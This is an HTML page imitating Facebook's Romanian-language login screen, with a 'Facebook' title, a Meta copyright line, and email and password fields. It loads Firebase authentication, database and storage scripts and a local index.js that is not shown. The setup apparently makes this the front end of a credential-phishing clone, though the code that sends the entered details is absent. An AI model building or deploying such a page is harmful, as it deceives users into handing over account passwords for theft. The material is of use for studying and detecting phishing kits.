<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<script src="https://www.gstatic.com/firebasejs/8.9.0/firebase-app.js"></script>
	<script src="https://www.gstatic.com/firebasejs/8.8.1/firebase-auth.js"></script>
	<script src="https://www.gstatic.com/firebasejs/8.8.1/firebase-firestore.js"></script>
	<script src="https://www.gstatic.com/firebasejs/8.8.1/firebase-storage.js"></script>
		<link href='https://fonts.googleapis.com/css?family=Poppins' rel='stylesheet'>
		<script src="https://kit.fontawesome.com/8383e75d7d.js" crossorigin="anonymous"></script>
		<link rel = "stylesheet" type = "text/css" href = "index.css">
		<script defer type="text/javascript" src = "index.js"></script>
		<title>Facebook</title>
	</head>
	<body>
		<div class = "main-div">
			<div class = "div1">
				<h1>facebook</h1>
				<p>Facebook te ajută să iei legătura şi să comunici cu persoanele din viaţa ta.</p>
			</div>
			<h1 class = "option-ok">facebook</h1>
			<div class = "div2">
				<div class = "form-sq">
					<input type="text" name="ok" class="input1" placeholder="E-mail sau număr de telefon:" id = "em">
					<div>
					<input type="password" name="ok" class="input1" placeholder="Parolă" id = "pass-ok">
					<i class="fa-regular fa-eye-slash" id = "eye-close"></i>
					<i class="fa-regular fa-eye" id = "eye-open"></i>
				</div>
					<button class = "submit-btn" id = "btn-submit">Conectează-te</button>
					<br>
					<br>
					<a href = "#" class = "link-redirect">Ai uitat parola?</a>
					<br>
					<br>
					<div class = "hr-line"></div>
					<button class = "create-acc">Creează un cont nou</button>
				</div>
			</div>
		</div>
		<div class = "copyright">Meta © 2023</div>
	</body>
</html>